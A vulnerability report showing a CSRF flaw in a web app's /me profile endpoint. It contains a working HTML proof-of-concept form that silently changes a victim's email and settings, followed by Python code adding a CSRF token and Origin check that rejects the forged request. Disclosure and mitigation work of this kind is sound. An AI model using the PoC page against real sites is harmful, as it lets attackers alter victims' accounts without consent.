An attacker can make a user change their profile settings through a CSRF vulnerability, demonstrated by the PoC file below.
The profile update request carries no CSRF token.
For example, changing the email address from “[email protected]” to “[email protected]” (test1’s profile).
Make the user open a link to this page, poc.html:
```html
<!-- PoC.html -->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8083/me" method="POST">
<input type="hidden" name="email" value="test1@test.comm" />
<input type="hidden" name="kindle_mail" value="" />
<input type="hidden" name="locale" value="en" />
<input type="hidden" name="default_language" value="all" />
<input type="hidden" name="show_16" value="on" />
<input type="hidden" name="show_65536" value="on" />
<input type="hidden" name="show_128" value="on" />
<input type="hidden" name="show_256" value="on" />
<input type="hidden" name="show_32" value="on" />
<input type="hidden" name="show_8" value="on" />
<input type="hidden" name="show_4" value="on" />
<input type="hidden" name="show_64" value="on" />
<input type="hidden" name="show_4096" value="on" />
<input type="hidden" name="show_2" value="on" />
<input type="hidden" name="show_8192" value="on" />
<input type="hidden" name="show_16384" value="on" />
<input type="hidden" name="show_32768" value="on" />
<input type="hidden" name="show_131072" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
This vulnerability allows unwanted actions and changes to the profile of a user who did not notice the hidden intent behind the page.
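The fix the report calls for is a CSRF token on the `/me` form. The following is an added illustration of that mitigation, not code from the report or from the affected application: it implements the synchronizer token pattern (a per-session secret embedded in the form and compared on every POST) plus an Origin/Referer check as defence in depth, and then replays both a legitimate submit and the parameters PoC.html sends. The `Session` class, the `TRUSTED_ORIGIN` value (taken from the PoC's form action) and the sample addresses are assumptions constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed application origin, taken from the PoC's form action.
TRUSTED_ORIGIN = "http://localhost:8083"


class Session:
    """Constructed stand-in for a framework's server-side session store."""

    def __init__(self):
        self.data = {}


def issue_csrf_token(session):
    """Create one unguessable token per session and reuse it for every form."""
    token = session.data.get("csrf_token")
    if token is None:
        token = secrets.token_urlsafe(32)
        session.data["csrf_token"] = token
    return token


def render_profile_form(session):
    """Embed the session token as a hidden field; a cross-site page cannot read it."""
    token = issue_csrf_token(session)
    return (
        '<form action="/me" method="POST">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="email"><input type="submit"></form>'
    )


def validate_profile_update(session, headers, form):
    """Return (ok, reason) for a POST to /me. Reject anything without a valid token."""
    expected = session.data.get("csrf_token")
    submitted = form.get("csrf_token", "")
    # Constant-time comparison on bytes so a non-ASCII value cannot raise instead of failing.
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False, "missing or invalid csrf_token"

    # Defence in depth: browsers attach Origin (or at least Referer) to cross-site form posts.
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False, "no Origin/Referer header"
    parts = urlsplit(origin)
    source = f"{parts.scheme}://{parts.netloc}"
    if source != TRUSTED_ORIGIN:
        return False, f"cross-site request from {source}"
    return True, "ok"


def simulate():
    """Replay a legitimate same-site submit and the cross-site submit PoC.html produces."""
    session = Session()
    token = issue_csrf_token(session)

    legitimate = validate_profile_update(
        session,
        {"Origin": TRUSTED_ORIGIN},
        {"csrf_token": token, "email": "user@example.invalid", "locale": "en"},
    )

    # Constructed reproduction of the PoC's request: the browser sends the victim's
    # session cookie, but the attacker's page has no token and a foreign Origin.
    forged = validate_profile_update(
        session,
        {"Origin": "http://attacker.invalid"},
        {"email": "test1@test.comm", "kindle_mail": "", "locale": "en", "default_language": "all"},
    )
    return {"legitimate": legitimate, "forged": forged}


if __name__ == "__main__":
    for name, (ok, reason) in simulate().items():
        print(f"{name}: {'accepted' if ok else 'rejected'} ({reason})")
```

The token check alone is what closes the hole; the Origin/Referer check catches misconfigurations where a token leaks into a form that is rendered cross-origin. Setting the session cookie's SameSite attribute to Lax or Strict is a further layer, but it should not replace the token, since older browsers and some top-level navigations do not honour it.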